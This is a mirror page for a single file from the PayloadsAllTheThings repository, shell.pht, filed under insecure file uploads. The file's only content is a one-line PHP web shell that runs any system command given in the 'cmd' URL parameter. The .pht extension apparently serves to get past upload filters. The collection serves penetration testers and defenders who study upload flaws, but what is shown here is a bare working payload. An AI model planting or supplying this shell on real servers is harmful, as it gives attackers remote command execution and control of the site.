1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-08-25 22:35:12 +02:00
PayloadsAllTheThings/Upload insecure files/PHP Extension/shell.pht
2018-11-17 14:40:12 +01:00

1 line
43 B
Plaintext
Executable File

<?php echo "Shell";system($_GET['cmd']); ?>